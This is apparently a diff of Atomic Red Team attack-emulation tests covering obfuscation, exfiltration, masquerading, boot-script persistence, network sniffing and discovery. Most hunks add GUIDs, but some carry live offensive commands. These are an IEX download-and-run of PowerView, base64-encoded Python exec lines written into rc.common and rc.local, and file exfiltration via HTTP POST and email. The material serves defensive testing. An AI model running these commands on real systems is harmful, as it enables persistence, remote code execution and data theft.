

 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | exe program containing dynamically compiled C# code | Path | PathToAtomicsFolder&#92;T1027.004&#92;bin&#92;T1027.004_DynamicCompile.exe|

@@ -92,7 +100,7 @@ Invoke-Expression #{input_file}
 ##### Description: exe file must exist on disk at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1} 
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -33,6 +33,10 @@ Upon successful execution, sh will execute art.sh, which is a base64 encoded com
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb
+
+
+



@@ -62,10 +66,14 @@ Upon successful execution, powershell will execute an encoded command and stdout
 **Supported Platforms:** Windows


+**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|

@@ -97,10 +105,14 @@ Upon successful execution, powershell will execute encoded command and read/writ
 **Supported Platforms:** Windows


+**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | registry_key_storage | Windows Registry Key to store code | String | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
 | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
@@ -138,10 +150,14 @@ Mimic execution of compressed executable. When successfully executed, calculator
 **Supported Platforms:** Windows


+**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|

@@ -166,7 +182,7 @@ del /Q "%temp%\T1027.zip" >nul 2>nul
 ##### Description: T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} 
+if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -188,10 +204,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 **Supported Platforms:** Windows


+**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
 | sender | sender email | string | test@corp.com|
@@ -203,7 +223,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p


 ```powershell
-"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
 ```


@@ -221,10 +241,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 **Supported Platforms:** Windows


+**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
 | ip_address | Destination IP address | string | 127.0.0.1|
@@ -234,7 +258,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p


 ```powershell
-Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
 ```


@@ -109,7 +109,7 @@ atomic_tests:
  supported_platforms:
  - windows
  input_arguments:
-    input_file: 
+    input_file:
      description: Path of the XLSM file
      type: path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
@@ -125,10 +125,9 @@ atomic_tests:
      description: SMTP Server IP Address
      type: string
      default: 127.0.0.1
-  dependency_executor_name: powershell
  executor:
    command: |
-      "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+      Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
    name: powershell

 - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
@@ -147,8 +146,7 @@ atomic_tests:
      description: Destination IP address
      type: string
      default: 127.0.0.1
-  dependency_executor_name: powershell
  executor:
    command: |
-      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
    name: powershell
@@ -15,10 +15,14 @@ Take a file/directory, split it into 5Mb chunks
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | File name | Path | T1030_urandom|
 | folder_path | Path where the test creates artifacts | Path | /tmp/T1030|
@@ -43,7 +47,7 @@ if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
 ##### Description: The file must exist for the test to run.
 ##### Check Prereq Commands:
 ```sh
-if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; 
+if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -24,10 +24,14 @@ Additionally, two files will be written to disk - computers.txt and usernames.tx
 **Supported Platforms:** Windows


+**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of remote computer | string | localhost|

@@ -62,6 +66,10 @@ Upon successful execution, sh will stdout list of usernames.
 **Supported Platforms:** Linux, macOS


+**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
+
+
+



@@ -88,6 +96,10 @@ Find existing user session on other computers. Upon execution, information about
 **Supported Platforms:** Windows


+**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
+
+
+



@@ -95,6 +107,7 @@ Find existing user session on other computers. Upon execution, information about


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
 ```

@@ -48,5 +48,6 @@ atomic_tests:
  - windows
  executor:
    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
    name: powershell
@@ -33,6 +33,10 @@ Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest,
 **Supported Platforms:** Windows


+**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717
+
+
+



@@ -64,6 +68,10 @@ Upon successful execution, sh is renamed to `crond` and executed.
 **Supported Platforms:** Linux


+**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
+
+
+



@@ -95,6 +103,10 @@ Upon successful execution, cscript.exe is renamed as notepad.exe and executed fr
 **Supported Platforms:** Windows


+**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0
+
+
+



@@ -126,6 +138,10 @@ Upon execution, no windows will remain open but wscript will have been renamed t
 **Supported Platforms:** Windows


+**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23
+
+
+



@@ -157,6 +173,10 @@ Upon successful execution, powershell.exe is renamed as taskhostw.exe and execut
 **Supported Platforms:** Windows


+**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
+
+
+



@@ -188,10 +208,14 @@ Upon successful execution, powershell will execute T1036.003.exe as svchost.exe
 **Supported Platforms:** Windows


+**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
 | inputfile | path of file to copy | path | PathToAtomicsFolder&#92;T1036.003&#92;bin&#92;T1036.003.exe|
@@ -217,7 +241,7 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
 ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inputfile}) {exit 0} else {exit 1} 
+if (Test-Path #{inputfile}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -237,10 +261,14 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
 **Supported Platforms:** Windows


+**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
 | inputfile | path of file to copy | path | $env:ComSpec|
@@ -276,6 +304,10 @@ Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from
 **Supported Platforms:** Windows


+**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
+
+
+



@@ -308,10 +340,14 @@ e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc
 **Supported Platforms:** Windows


+**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_path | path to exe to use when creating masquerading files | path | C:&#92;Windows&#92;System32&#92;calc.exe|
 | vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder&#92;T1036.003&#92;src&#92;T1036.003_masquerading.vbs|
@@ -19,6 +19,10 @@ Creating W32Time similar named service (win32times) using schtasks just like thr
 **Supported Platforms:** Windows


+**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
+
+
+



@@ -48,6 +52,10 @@ Creating W32Time similar named service (win32times) using sc just like threat ac
 **Supported Platforms:** Windows


+**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66
+
+
+



@@ -0,0 +1,51 @@
+# T1036.005 - Match Legitimate Name or Location
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
+<blockquote>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
+
+Adversaries may also use the same icon of the file they are trying to mimic.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
+
+
+<br/>
+
+## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
+Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+**Supported Platforms:** macOS, Linux
+
+
+**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+mkdir $HOME/...
+cp $(which sh) $HOME/...
+$HOME/.../sh -c "echo #{test_message}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f $HOME/.../sh
+rmdir $HOME/.../
+```
+
+
+
+
+
+<br/>
@@ -0,0 +1,30 @@
+---
+attack_technique: T1036.005
+display_name: 'Masquerading: Match Legitimate Name or Location'
+
+atomic_tests:
+- name: Execute a process from a directory masquerading as the current parent directory.
+  auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+  description: |
+    Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+  supported_platforms:
+    - macos
+    - linux
+
+  input_arguments:
+    test_message:
+      description: Test message to echo out to the screen
+      type: String
+      default: Hello from the Atomic Red Team test T1036.005#1
+
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      mkdir $HOME/...
+      cp $(which sh) $HOME/...
+      $HOME/.../sh -c "echo #{test_message}"
+    cleanup_command: |
+      rm -f $HOME/.../sh
+      rmdir $HOME/.../
@@ -19,6 +19,10 @@ Space After Filename
 **Supported Platforms:** macOS


+**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f
+
+
+


 #### Run it with these steps! 
@@ -17,6 +17,10 @@ It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a n
 **Supported Platforms:** Windows


+**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+
+
+



@@ -18,10 +18,14 @@ that can be viewed in the Registry Editor.
 **Supported Platforms:** Windows


+**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_path | Path to .bat file | String | %temp%&#92;art.bat|
 | script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037.001-log.txt|
@@ -17,6 +17,10 @@ Mac logon script
 **Supported Platforms:** macOS


+**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4
+
+
+


 #### Run it with these steps! 
@@ -12,6 +12,10 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr

 - [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)

+- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon)
+
+- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
+

 <br/>

@@ -23,6 +27,10 @@ Modify rc.common
 **Supported Platforms:** macOS


+**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de
+
+
+



@@ -38,4 +46,76 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e



+<br/>
+<br/>
+
+## Atomic Test #2 - rc.common
+Modify rc.common
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+sudo chmod +x /etc/rc.common
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - rc.local
+Modify rc.local
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+sudo chmod +x /etc/rc.local
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+```
+
+
+
+
+
 <br/>
@@ -15,3 +15,42 @@ atomic_tests:
    elevation_required: true
    name: bash

+
+- name: rc.common
+  auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+  description: |
+    Modify rc.common
+
+  supported_platforms:
+    - linux
+  executor:
+    name: bash
+    elevation_required: true 
+    command: | 
+      filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+      printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+      printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+      sudo chmod +x /etc/rc.common
+    cleanup_command: | 
+      origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+
+- name: rc.local
+  auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+  description: |
+    Modify rc.local
+
+  supported_platforms:
+    - linux
+  executor:
+    name: bash
+    elevation_required: true 
+    command: | 
+      filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+      printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+      printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+      sudo chmod +x /etc/rc.local
+    cleanup_command: | 
+      origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+
@@ -21,6 +21,10 @@ Modify or create an file in /Library/StartupItems
 **Supported Platforms:** macOS


+**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198
+
+
+



@@ -27,10 +27,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
 **Supported Platforms:** Linux


+**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | ens33|

@@ -50,7 +54,7 @@ tshark -c 5 -i #{interface}
 ##### Description: Check if at least one of the tools are installed on the machine.
 ##### Check Prereq Commands:
 ```bash
-if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; 
+if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -71,10 +75,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
 **Supported Platforms:** macOS


+**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | en0A|

@@ -94,7 +102,7 @@ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
 ##### Description: Check if at least one of the tools are installed on the machine.
 ##### Check Prereq Commands:
 ```bash
-if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; 
+if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -116,10 +124,14 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 **Supported Platforms:** Windows


+**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | Ethernet|
 | wireshark_url | wireshark installer download URL | url | https://1.eu.dl.wireshark.org/win64/Wireshark-win64-3.4.5.exe|
@@ -142,7 +154,7 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 ##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
 ##### Check Prereq Commands:
 ```powershell
-if (test-path "#{tshark_path}") {exit 0} else {exit 1} 
+if (test-path "#{tshark_path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -152,7 +164,7 @@ Start-Process $env:temp\wireshark_installer.exe /S
 ##### Description: npcap must be installed.
 ##### Check Prereq Commands:
 ```powershell
-if (test-path "#{npcap_path}") {exit 0} else {exit 1} 
+if (test-path "#{npcap_path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -173,6 +185,10 @@ After execution you should find a file named trace.etl and trace.cab in the temp
 **Supported Platforms:** Windows


+**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528
+
+
+



@@ -25,6 +25,10 @@ Upon successful execution, sh will perform a network connection against a single
 **Supported Platforms:** Linux, macOS


+**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540
+
+
+



@@ -54,10 +58,14 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
 **Supported Platforms:** Linux, macOS


+**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host | Host to scan. | string | 192.168.1.1|
 | port | Ports to scan. | string | 80|
@@ -80,7 +88,7 @@ nc -nv #{host} #{port}
 ##### Description: Check if nmap command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -99,10 +107,14 @@ Scan ports to check for listening ports for the local host 127.0.0.1
 **Supported Platforms:** Windows


+**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe|
 | host_to_scan | The host to scan with NMap | string | 127.0.0.1|
@@ -122,7 +134,7 @@ nmap #{host_to_scan}
 ##### Description: NMap must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} 
+if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -142,10 +154,14 @@ Scan ports to check for listening ports with python
 **Supported Platforms:** Windows


+**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host_ip | Host to scan. | string | 127.0.0.1|
 | filename | Location of the project file | Path | PathToAtomicsFolder&#92;T1046&#92;src&#92;T1046.py|
@@ -165,7 +181,7 @@ python #{filename} -i #{host_ip}
 ##### Description: Check if python exists on the machine
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1} 
+if (python --version) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -32,6 +32,10 @@ When the test completes , there should be local user accounts information displa
 **Supported Platforms:** Windows


+**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
+
+
+



@@ -57,6 +61,10 @@ When the test completes , there should be running processes listed on the comman
 **Supported Platforms:** Windows


+**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
+
+
+



@@ -82,6 +90,10 @@ When the test completes, there should be a list of installed patches and when th
 **Supported Platforms:** Windows


+**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
+
+
+



@@ -110,10 +122,14 @@ if the provided remote host is unreacheable
 **Supported Platforms:** Windows


+**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | String | 127.0.0.1|
 | service_search_string | Name Of Service | String | Spooler|
@@ -141,10 +157,14 @@ When the test completes , a new process will be started locally .A notepad appli
 **Supported Platforms:** Windows


+**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_to_execute | Name or path of process to execute. | String | notepad.exe|

@@ -176,10 +196,14 @@ A common error message is "Node - (provided IP or default)  ERROR Description =T
 **Supported Platforms:** Windows


+**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | String | 127.0.0.1|
 | user_name | Username | String | DOMAIN&#92;Administrator|
@@ -218,6 +242,10 @@ You should expect to see notepad.exe running after execution of this test.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
+
+
+



@@ -243,10 +271,14 @@ This test tries to mask process creation by creating a new class that inherits f
 **Supported Platforms:** Windows


+**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | new_class | Derived class name | String | Win32_Atomic|
 | process_to_execute | Name or path of process to execute. | String | notepad.exe|
@@ -27,6 +27,10 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
+
+
+


 #### Run it with these steps! 
@@ -61,10 +65,14 @@ Upon successful execution, powershell will utilize ping (icmp) to exfiltrate not
 **Supported Platforms:** Windows


+**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to be exfiltrated. | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
 | ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|
@@ -91,6 +99,10 @@ Exfiltration of specified file over DNS protocol.
 **Supported Platforms:** Linux


+**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
+
+
+


 #### Run it with these steps! 
@@ -122,10 +134,14 @@ Upon successful execution, powershell will invoke web request using POST method
 **Supported Platforms:** Windows


+**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to exfiltrate | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
 | ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1|
@@ -154,10 +170,14 @@ Upon successful execution, powershell will send an email with attached file to e
 **Supported Platforms:** Windows


+**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9
